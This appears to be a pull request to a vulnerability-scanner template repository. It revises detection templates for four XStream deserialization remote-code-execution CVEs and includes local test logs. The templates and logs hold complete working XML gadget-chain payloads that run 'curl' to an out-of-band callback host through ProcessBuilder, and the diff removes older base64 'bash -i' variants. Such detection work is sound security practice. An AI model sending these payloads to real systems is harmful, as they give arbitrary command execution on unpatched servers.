### PR TITLE
Fixed CVE-2013-7285 / Updated CVE-2020-26217 / Updated  CVE-2021-21345 / Updated  CVE-2021-39144

### DIFF
--- a/http/cves/2013/CVE-2013-7285.yaml
+++ b/http/cves/2013/CVE-2013-7285.yaml
@@ -2,16 +2,16 @@ id: CVE-2013-7285
 
 info:
   name: XStream <1.4.6/1.4.10 - Remote Code Execution
-  author: pwnhxl
+  author: pwnhxl,vicrack
   severity: critical
   description: |
     Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
   reference:
-    - http://x-stream.github.io/CVE-2013-7285.html
     - https://x-stream.github.io/CVE-2013-7285.html
     - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html
     - https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html
     - https://nvd.nist.gov/vuln/detail/cve-2013-7285
+    - https://blog.csdn.net/Xxy605/article/details/126297121
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -30,17 +30,21 @@ http:
         Host: {{Hostname}}
         Content-Type: application/xml
 
-        <contact class='dynamic-proxy'>
-          <interface>org.company.model.Contact</interface>
-          <handler class='java.beans.EventHandler'>
-            <target class='java.lang.ProcessBuilder'>
-              <command>
-                <string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
-              </command>
-            </target>
-            <action>start</action>
-          </handler>
-        </contact>
+        <sorted-set>
+            <string>foo</string>
+            <contact class='dynamic-proxy'>
+              <interface>java.lang.Comparable</interface>
+              <handler class='java.beans.EventHandler'>
+                  <target class='java.lang.ProcessBuilder'>
+                      <command>
+                        <string>curl</string>
+                        <string>http://{{interactsh-url}}</string>
+                      </command>
+                  </target>
+                  <action>start</action>
+              </handler>
+          </contact>
+        </sorted-set>
 
     matchers-condition: and
     matchers:
@@ -52,6 +56,5 @@ http:
       - type: word
         part: interactsh_request
         words:
-          - "User-Agent: {{rand_base(6)}}"
-
+          - "User-Agent: curl"
 # Enhanced by md on 2023/04/12

--- a/http/cves/2020/CVE-2020-26217.yaml
+++ b/http/cves/2020/CVE-2020-26217.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-26217
 
 info:
   name: XStream <1.4.14 - Remote Code Execution
-  author: pwnhxl
+  author: pwnhxl,vicrack
   severity: high
   description: |
     XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected.
@@ -47,7 +47,8 @@ http:
                             <outer-class>
                               <java.lang.ProcessBuilder>
                                 <command>
-                                  <string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
+                                  <string>curl</string>
+                                  <string>http://{{interactsh-url}}</string>
                                 </command>
                               </java.lang.ProcessBuilder>
                             </outer-class>
@@ -92,6 +93,5 @@ http:
       - type: word
         part: interactsh_request
         words:
-          - "User-Agent: {{rand_base(6)}}"
-
+          - "User-Agent: curl"
 # Enhanced by md on 2023/04/12

--- a/http/cves/2021/CVE-2021-21345.yaml
+++ b/http/cves/2021/CVE-2021-21345.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-21345
 
 info:
   name: XStream <1.4.16  - Remote Code Execution
-  author: pwnhxl
+  author: pwnhxl,vicrack
   severity: critical
   description: |
     XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
@@ -21,9 +21,6 @@ info:
   tags: cve,cve2021,xstream,deserialization,rce,oast
   metadata:
     max-request: 1
-
-variables:
-  rand: "{{rand_base(6)}}"
 
 http:
   - raw:
@@ -76,7 +73,7 @@ http:
                           </bridge>
                         </bridge>
                         <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
-                          <activationCmd>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</activationCmd>
+                          <activationCmd>curl http://{{interactsh-url}}</activationCmd>
                         </jaxbObject>
                       </dataSource>
                     </message>
@@ -102,4 +99,4 @@ http:
       - type: word
         part: interactsh_request
         words:
-          - "User-Agent: {{rand}}"
+          - "User-Agent: curl"

--- a/http/cves/2021/CVE-2021-39144.yaml
+++ b/http/cves/2021/CVE-2021-39144.yaml
@@ -2,12 +2,11 @@ id: CVE-2021-39144
 
 info:
   name: XStream 1.4.18  - Remote Code Execution
-  author: pwnhxl
+  author: pwnhxl,vicrack
   severity: high
   description: |
     XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.
   reference:
-    - http://x-stream.github.io/CVE-2021-39144.html
     - https://x-stream.github.io/CVE-2021-39144.html
     - https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh
     - https://security.netapp.com/advisory/ntap-20210923-0003/
@@ -21,9 +20,6 @@ info:
   tags: cve,cve2021,xstream,deserialization,rce,kev
   metadata:
     max-request: 1
-
-variables:
-  rand: "{{rand_base(6)}}"
 
 http:
   - raw:
@@ -67,7 +63,7 @@ http:
                 </probes>
               </handler>
             </dynamic-proxy>
-            <string>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</string>
+            <string>curl http://{{interactsh-url}}</string>
           </java.util.PriorityQueue>
         </java.util.PriorityQueue>
 
@@ -81,6 +77,5 @@ http:
       - type: word
         part: interactsh_request
         words:
-          - "User-Agent: {{rand}}"
-
+          - "User-Agent: curl"
 # Enhanced by cs on 2023/04/17


### PR DESCRIPTION
### Template / PR Information

Update xstream template

- Fixed CVE-2013-7285 / Updated CVE-2020-26217 / Updated  CVE-2021-21345 / Updated  CVE-2021-39144
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


### Additional Details 

demo (xstream 1.4.6) 
[xstream-1.4.6-SNAPSHOT.jar.zip](https://github.com/projectdiscovery/nuclei-templates/files/11412848/xstream-1.4.6-SNAPSHOT.jar.zip)
[demo source](https://github.com/projectdiscovery/nuclei-templates/files/11412860/demo.zip)

`java -jar xstream-1.4.6-SNAPSHOT.jar`


false-negative CVE-2013-7285
enhancement: CVE-2020-26217, CVE-2021-21345,  CVE-2021-39144


### Additional References:

https://github.com/projectdiscovery/nuclei-templates/pull/7112#issuecomment-1530935429

### Test:

```
[INF] [CVE-2013-7285] Dumped HTTP request for http://127.0.0.1:8089/

POST / HTTP/1.1
Host: 127.0.0.1:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 505
Content-Type: application/xml
Accept-Encoding: gzip

<sorted-set>
    <string>foo</string>
    <contact class='dynamic-proxy'>
      <interface>java.lang.Comparable</interface>
      <handler class='java.beans.EventHandler'>
          <target class='java.lang.ProcessBuilder'>
              <command>
                <string>curl</string>
                <string>http://chb7r20tjm0jp969v8egtqby9bq5mefiu.oast.site</string>
              </command>
          </target>
          <action>start</action>
      </handler>
  </contact>
</sorted-set>
[DBG] [CVE-2013-7285] Dumped HTTP response http://127.0.0.1:8089/

HTTP/1.1 500
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
Date: Sat, 06 May 2023 16:17:15 GMT

{"timestamp":"2023-05-06T16:17:15.592+00:00","status":500,"error":"Internal Server Error","path":"/"}
[chb7r20tjm0jp969v8egtqby9bq5mefiu] Received HTTP interaction from 99.88.22.40 at 2023-05-06 16:17:33
------------
HTTP Request
------------

GET / HTTP/1.1
Host: chb7r20tjm0jp969v8egtqby9bq5mefiu.oast.site
Accept: */*
User-Agent: curl/7.83.1




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.site
X-Interactsh-Version: 1.1.2

<html><head></head><body>uifem5qb9ybqtge8v969pj0mjt02r7bhc</body></html>

[CVE-2013-7285:word-1] [http] [critical] http://127.0.0.1:8089/
[CVE-2013-7285:word-2] [http] [critical] http://127.0.0.1:8089/
```


```
[INF] [CVE-2020-26217] Dumped HTTP request for http://127.0.0.1:8089/

POST / HTTP/1.1
Host: 127.0.0.1:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Content-Length: 2104
Content-Type: application/xml
Accept-Encoding: gzip

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>curl</string>
                          <string>http://chb7sf0tjm0mno59gre0iuphxsp6one5g.oast.pro</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>
[DBG] [CVE-2020-26217] Dumped HTTP response http://127.0.0.1:8089/

HTTP/1.1 500
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
Date: Sat, 06 May 2023 16:20:14 GMT

{"timestamp":"2023-05-06T16:20:14.416+00:00","status":500,"error":"Internal Server Error","path":"/"}
[chb7sf0tjm0mno59gre0iuphxsp6one5g] Received HTTP interaction from 99.88.22.40 at 2023-05-06 16:20:32
------------
HTTP Request
------------

GET / HTTP/1.1
Host: chb7sf0tjm0mno59gre0iuphxsp6one5g.oast.pro
Accept: */*
User-Agent: curl/7.83.1




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.pro
X-Interactsh-Version: 1.1.2

<html><head></head><body>g5eno6psxhpui0erg95onm0mjt0fs7bhc</body></html>

[CVE-2020-26217:word-1] [http] [high] http://127.0.0.1:8089/
[CVE-2020-26217:word-2] [http] [high] http://127.0.0.1:8089/

```


```
[INF] [CVE-2021-21345] Dumped HTTP request for http://127.0.0.1:8089/

POST / HTTP/1.1
Host: 127.0.0.1:8089
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 2848
Content-Type: application/xml
Accept-Encoding: gzip

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
                      <uriProperties/>
                      <attributeProperties/>
                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
                        <getter>
                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
                          <name>verify</name>
                          <parameter-types/>
                        </getter>
                      </inheritedAttWildcard>
                    </bi>
                    <tagName/>
                    <context>
                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
                        <outer-class reference='../..'/>
                      </marshallerPool>
                      <nameList>
                        <nsUriCannotBeDefaulted>
                          <boolean>true</boolean>
                        </nsUriCannotBeDefaulted>
                        <namespaceURIs>
                          <string>1</string>
                        </namespaceURIs>
                        <localNames>
                          <string>UTF-8</string>
                        </localNames>
                      </nameList>
                    </context>
                  </bridge>
                </bridge>
                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
                  <activationCmd>curl http://chb81cgtjm0gk812pmt03rsumz8atpjiz.oast.site</activationCmd>
                </jaxbObject>
              </dataSource>
            </message>
            <satellites/>
            <invocationProperties/>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
[DBG] [CVE-2021-21345] Dumped HTTP response http://127.0.0.1:8089/

HTTP/1.1 500
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
Date: Sat, 06 May 2023 16:30:48 GMT

{"timestamp":"2023-05-06T16:30:48.957+00:00","status":500,"error":"Internal Server Error","path":"/"}
[chb81cgtjm0gk812pmt03rsumz8atpjiz] Received HTTP interaction from 99.88.22.40 at 2023-05-06 16:30:49
------------
HTTP Request
------------

GET / HTTP/1.1
Host: chb81cgtjm0gk812pmt03rsumz8atpjiz.oast.site
Accept: */*
User-Agent: curl/7.83.1




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.site
X-Interactsh-Version: 1.1.2

<html><head></head><body>zijpta8zmusr30tmp218kg0mjtgc18bhc</body></html>

[CVE-2021-21345:word-1] [http] [critical] http://127.0.0.1:8089/
[CVE-2021-21345:word-2] [http] [critical] http://127.0.0.1:8089/
```
![图片](https://user-images.githubusercontent.com/18179821/236637202-ec1905b7-162c-45f1-a953-6529de8c4b64.png)
